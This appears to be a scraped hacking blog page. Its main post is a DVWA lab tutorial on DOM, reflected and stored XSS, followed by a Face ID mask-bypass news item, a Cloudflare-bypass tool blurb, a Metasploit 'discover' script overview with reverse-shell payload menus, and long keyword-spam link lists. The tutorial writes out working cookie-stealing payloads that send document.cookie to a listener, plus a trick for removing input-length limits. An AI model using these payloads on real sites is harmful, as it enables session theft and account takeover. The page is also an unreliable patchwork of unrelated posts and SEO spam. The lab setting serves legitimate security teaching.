Pages

Amazon

Saturday, 22 August 2020

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.

DOM Based XSS:

Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
http://localhost:9000/vulnerabilities/xss_d/?default=English
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script>
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
python3 -m http.server
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.

Reflected XSS:

Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
<script>alert("XSS")</script>
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
<script>alert(XSS)</script>
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/

Continue reading


APPLE IPHONE X FACE ID CAN BE HACKED WITH SILICON MASK

Just a week after Apple released its brand new iPhone X on November 3, a team of researchers has claimed to successfully hack Apple's Face ID facial recognition technology with a mask that costs less than $150. They said Apple iPhone x face id can be hacked with silicon mask easily.

apple iPhone x face id hacked
Yes, Apple's "ultra-secure" Face ID security for the iPhone X is not as secure as the company claimed during its launch event in September this year.

"Apple engineering teams have even gone and worked with professional mask makers and makeup artists in Hollywood to protect against these attempts to beat Face ID," Apple's senior VP of worldwide marketing Phil Schiller said about Face ID system during the event.

"These are actual masks used by the engineering team to train the neural network to protect against them in Face ID."

However, the bad news is that researchers from Vietnamese cybersecurity firm Bkav were able to unlock the iPhone X using a mask.

Yes, Bkav researchers have a better option than holding it up to your face while you sleep. Bkav researchers re-created the owner's face through a combination of 3D printed mask, makeup, and 2D images with some "special processing done on the cheeks and around the face, where there are large skin areas" and the nose is created from silicone.

The researchers have also published a proof-of-concept video, showing the brand-new iPhone X first being unlocked using the specially constructed mask, and then using the Bkav researcher's face, in just one go.

"Many people in the world have tried different kinds of masks but all failed. It is because we understand how AI of Face ID works and how to bypass it," an FAQ on the Bkav website said.

"You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face. It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought."

Researchers explain that their "proof-of-concept" demo took about five days after they got iPhone X on November 5th. They also said the demo was performed against one of their team member's face without training iPhone X to recognize any components of the mask.

"We used a popular 3D printer. The nose was made by a handmade artist. We use 2D printing for other parts (similar to how we tricked Face Recognition 9 years ago). The skin was also hand-made to trick Apple's AI," the firm said.

The security firm said it cost the company around $150 for parts (which did not include a 3D printer), though it did not specify how many attempts its researchers took them to bypass the security of Apple's Face ID.

It should be noted that creating such a mask to unlock someone's iPhone is a time-consuming process and it is not possible to hack into a random person's iPhone.

However, if you prefer privacy and security over convenience, we highly recommend you to use a passcode instead of fingerprint or Face ID to unlock your phone.
Related posts
  1. Hacking Tools Windows 10
  2. Pentest Tools Alternative
  3. Pentest Tools Url Fuzzer
  4. Beginner Hacker Tools
  5. Physical Pentest Tools
  6. Pentest Tools Website Vulnerability
  7. Pentest Tools Port Scanner
  8. Hacking Tools For Beginners
  9. Hacking Tools Software
  10. Pentest Tools For Ubuntu
  11. World No 1 Hacker Software
  12. Hacker Tools
  13. Easy Hack Tools
  14. Hacking Tools For Beginners
  15. Best Hacking Tools 2020
  16. Hacking Apps
  17. Best Hacking Tools 2020
  18. Hack Tools For Windows
  19. Hacker Tools Apk Download
  20. Hacker Tools For Ios
  21. Hack Tools Pc
  22. Hacker Tools Online
  23. Nsa Hacker Tools
  24. Android Hack Tools Github
  25. Pentest Tools For Android
  26. Pentest Tools For Android
  27. Hacker Tools 2019
  28. Hack Tool Apk
  29. Hacker Tools Mac
  30. Hacking Tools For Games
  31. Hacker Hardware Tools
  32. Hack Tools
  33. Hacking Tools For Kali Linux
  34. Hacker Hardware Tools
  35. Android Hack Tools Github
  36. Hacking Tools Software
  37. Pentest Tools Subdomain
  38. Pentest Tools Website Vulnerability
  39. Game Hacking
  40. Pentest Tools Download
  41. Growth Hacker Tools
  42. Hacking Tools Download
  43. Growth Hacker Tools
  44. Pentest Tools Github
  45. Pentest Tools For Ubuntu
  46. Hacking Tools For Windows 7
  47. Hacking Tools For Windows
  48. How To Hack
  49. Tools For Hacker
  50. Usb Pentest Tools
  51. Hack App
  52. Hacker Tools For Ios
  53. Hack Tools For Games
  54. Hack App
  55. Hacker Tools Free Download
  56. Hacker Tools 2019
  57. Best Hacking Tools 2020
  58. Hacking Tools Kit
  59. Hacking Tools And Software
  60. Pentest Tools Apk
  61. Hacker Tools List
  62. Hacker Tools Software
  63. Bluetooth Hacking Tools Kali
  64. Hack App
  65. Hacking Tools Hardware
  66. Tools For Hacker
  67. Hacker Tools Github
  68. Github Hacking Tools
  69. Hack Tools For Mac
  70. Pentest Tools Online
  71. Pentest Tools Website Vulnerability
  72. Hacking Tools Pc
  73. Pentest Tools Url Fuzzer
  74. Hacker Tools Mac
  75. Hacking Tools Free Download
  76. How To Make Hacking Tools
  77. Hacking Tools Kit
  78. Pentest Tools Find Subdomains

CLOUDKiLL3R - Bypasses Cloudflare Protection Service Via TOR Browser


CLOUDKiLL3R bypasses Cloudflare protection service via TOR Browser !

CLOUDKiLL3R Requirements :
  • TOR Browser to scan as many sites as you want :)
  • Python Compiler

CLOUDKiLL3R Installation ?
Make sure that TOR Browser is up and running while working with CLOUDKiLL3R .
Make sure that the IP AND PORT are the same in TOR Browser preferences > advanced > Networks
Include the files below in one folder :
  • FILTER.txt
  • CK.pl
Make Sure The Modules Below Are Installed If NOT > use this command to install one : pip install [module name]
  • argparse
  • socks
  • socket
  • requests
  • sys

Contact :
Twitter.com/moh_security


More info


  1. Hack Apps
  2. Hacking Tools For Windows
  3. Pentest Tools Alternative
  4. New Hacker Tools
  5. Pentest Tools Linux
  6. Tools Used For Hacking
  7. Pentest Tools Subdomain
  8. Pentest Tools
  9. Hacking Tools Hardware
  10. Pentest Tools
  11. Hacker Tools For Mac
  12. Pentest Tools Find Subdomains
  13. Hacker Tools List
  14. Pentest Box Tools Download
  15. Hack Tools For Pc
  16. Hack Tools Mac
  17. Hacker
  18. Github Hacking Tools
  19. Pentest Tools Free
  20. Pentest Tools Find Subdomains
  21. Hacker Tools Github
  22. Hacker Tools 2019
  23. Hacking Tools For Games
  24. Hacker Tools Mac
  25. Hacker Tools For Pc
  26. Hack Tools For Ubuntu
  27. Hacker Security Tools
  28. Install Pentest Tools Ubuntu
  29. Hack Tools For Ubuntu
  30. Pentest Tools Framework
  31. Pentest Tools Tcp Port Scanner
  32. Hacker Tools Online
  33. Game Hacking
  34. Hacking Tools Windows 10
  35. Pentest Tools Kali Linux
  36. Wifi Hacker Tools For Windows
  37. Hack Tools For Ubuntu
  38. Kik Hack Tools
  39. Kik Hack Tools
  40. Hacker Tools 2020
  41. Pentest Tools Alternative
  42. Hacker Tools 2020
  43. Tools Used For Hacking
  44. Blackhat Hacker Tools
  45. Hack Tools Online
  46. What Are Hacking Tools
  47. Hacking Tools For Games
  48. Nsa Hack Tools
  49. New Hack Tools
  50. Pentest Tools Kali Linux
  51. Hacker Tool Kit
  52. Hacker Tools Online
  53. Hacker Tools For Windows
  54. Hacking Tools Github
  55. Hacking Tools Online
  56. Hacking Tools Software
  57. Hacker
  58. Hacking Tools For Windows Free Download
  59. Hacking Tools Online
  60. Hacking Tools For Windows
  61. Hacking Tools Windows 10
  62. Pentest Tools For Ubuntu
  63. Hacking Tools For Windows Free Download
  64. Pentest Automation Tools
  65. Pentest Tools Subdomain
  66. Hack Tools For Ubuntu
  67. Hacker Tools Software
  68. Pentest Tools Android
  69. Hacker Tools For Windows
  70. Hackers Toolbox
  71. Pentest Reporting Tools
  72. Hack Tools For Games
  73. Hack Tool Apk No Root
  74. Pentest Automation Tools
  75. Pentest Tools Kali Linux

Friday, 21 August 2020

Discover: A Custom Bash Scripts Used To Perform Pentesting Tasks With Metasploit


About discover: discover is a custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit Framework. For use with Kali Linux, Parrot Security OS and the Penetration Testers Framework (PTF).

About authors:


discover Installation and Updating


About RECON in discover
   Domain

RECON

1. Passive

2. Active
3. Import names into an existing recon-ng workspace
4. Previous menu

   Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit Framework, URLCrazy, Whois, multiple websites, and recon-ng.

   Active uses dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng.
   [*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, Hunter, SecurityTrails, and Shodan for maximum results with recon-ng and theHarvester.

API key locations:

recon-ng
   show keys
   keys add bing_api <value>

theHarvester
   /opt/theHarvester/api-keys.yaml

   Person: Combines info from multiple websites.

RECON

First name:

Last name:

   Parse salesforce: Gather names and positions into a clean list.

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list:

About SCANNING in discover
   Generate target list: Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

SCANNING

1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu


   CIDR, List, IP, Range, or URL

Type of scan:

1. External

2. Internal
3. Previous menu

  • External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
  • Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
  • Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
  • Matching nmap scripts are used for additional enumeration.
  • Addition tools: enum4linux, smbclient, and ike-scan.
  • Matching Metasploit auxiliary modules are also leveraged.

About WEB in discover
   Insecure direct object reference

Using Burp, authenticate to a site, map & Spider, then log out.
Target > Site map > select the URL > right click > Copy URLs in this host.

Paste the results into a new file.


Enter the location of your file:

   Open multiple tabs in Firefox

Open multiple tabs in Firefox with:

1. List

2. Directories from robots.txt.
3. Previous menu

  • Use a list containing IPs and/or URLs.
  • Use wget to pull a domain's robot.txt file, then open all of the directories.

   Nikto

Run multiple instances of Nikto in parallel.

1. List of IPs.
2. List of IP:port.
3. Previous menu

   SSL: Use sslscan and sslyze to check for SSL/TLS certificate issues.

Check for SSL certificate issues.

Enter the location of your list:


About MISC in discover
   Parse XML

Parse XML to CSV.

1. Burp (Base64)

2. Nessus (.nessus)
3. Nexpose (XML 2.0)
4. Nmap
5. Qualys
6. revious menu

   Generate a malicious payload

Malicious Payloads

1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. java/jsp_shell_reverse_tcp (Linux)
4. java/jsp_shell_reverse_tcp (Windows)
5. linux/x64/meterpreter_reverse_https
6. linux/x64/meterpreter_reverse_tcp
7. linux/x64/shell/reverse_tcp
8. osx/x64/meterpreter_reverse_https
9. osx/x64/meterpreter_reverse_tcp
10. php/meterpreter/reverse_tcp
11. python/meterpreter_reverse_https 12. python/meterpreter_reverse_tcp
13. windows/x64/meterpreter_reverse_https
14. windows/x64/meterpreter_reverse_tcp
15. Previous menu

   Start a Metasploit listener

Metasploit Listeners

1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. java/jsp_shell_reverse_tcp
4. linux/x64/meterpreter_reverse_https
5. linux/x64/meterpreter_reverse_tcp
6. linux/x64/shell/reverse_tcp
7. osx/x64/meterpreter_reverse_https
8. osx/x64/meterpreter_reverse_tcp
9. php/meterpreter/reverse_tcp
10. python/meterpreter_reverse_https
11. python/meterpreter_reverse_tcp
12. windows/x64/meterpreter_reverse_https
13. windows/x64/meterpreter_reverse_tcp
14. Previous menu


More info


  1. Beginner Hacker Tools
  2. Hack Tools Pc
  3. Hacker Techniques Tools And Incident Handling
  4. Hack Tools 2019
  5. Hacking Tools And Software
  6. Pentest Tools Tcp Port Scanner
  7. Hacker Tools Mac
  8. Hack Tools For Ubuntu
  9. Hacking Tools For Windows
  10. Hacker Tools Free Download
  11. Usb Pentest Tools
  12. Pentest Tools Apk
  13. Hacking Tools Github
  14. Best Hacking Tools 2019
  15. Hacking Tools Windows
  16. Pentest Tools Subdomain
  17. Hacking Tools Hardware
  18. Hack Tools For Windows
  19. Hack Tools For Games
  20. Hacking Tools Hardware
  21. How To Make Hacking Tools
  22. Hacking Tools Hardware
  23. Hacking Tools For Mac
  24. Best Pentesting Tools 2018
  25. Pentest Tools For Windows
  26. Pentest Tools List
  27. Tools For Hacker
  28. Hacker Tools Apk
  29. Hacking Tools Name
  30. Pentest Tools Windows
  31. Ethical Hacker Tools
  32. Hacking Tools For Windows
  33. Hacking Tools Name
  34. Hacker Tools Online
  35. Pentest Tools
  36. Hack And Tools
  37. Hacking Tools Usb
  38. Hack Tools
  39. Tools For Hacker
  40. Hacker Tools Free
  41. Hack Tools
  42. Hacker Tools For Ios
  43. Pentest Tools Website Vulnerability
  44. Pentest Tools Github
  45. Hack Tools For Windows
  46. What Is Hacking Tools
  47. Pentest Tools For Ubuntu
  48. Computer Hacker
  49. Hacking Tools For Mac
  50. Hacker Tools Free
  51. Ethical Hacker Tools
  52. Hacking Apps
  53. Pentest Tools Apk
  54. Pentest Tools Tcp Port Scanner
  55. Hacker Tools Windows
  56. Pentest Tools Subdomain
  57. Hacking Tools And Software
  58. Hacker Tools Free Download
  59. Hack Tools Mac
  60. Pentest Tools List
  61. Hack Tools Pc
  62. Blackhat Hacker Tools
  63. Hacker Tools Apk Download
  64. Hacking Tools And Software
  65. What Are Hacking Tools
  66. Hacker Tools
  67. What Are Hacking Tools
  68. Pentest Tools Apk
  69. Hacking Tools Windows 10
  70. How To Hack
  71. Hacking Tools Software
  72. Hacker Tools 2020
  73. Github Hacking Tools
  74. Hacker Hardware Tools
  75. Hacking Tools Kit
  76. Pentest Tools For Mac
  77. Pentest Tools Free
  78. Pentest Tools List
  79. New Hack Tools
  80. Hacker
  81. Hacks And Tools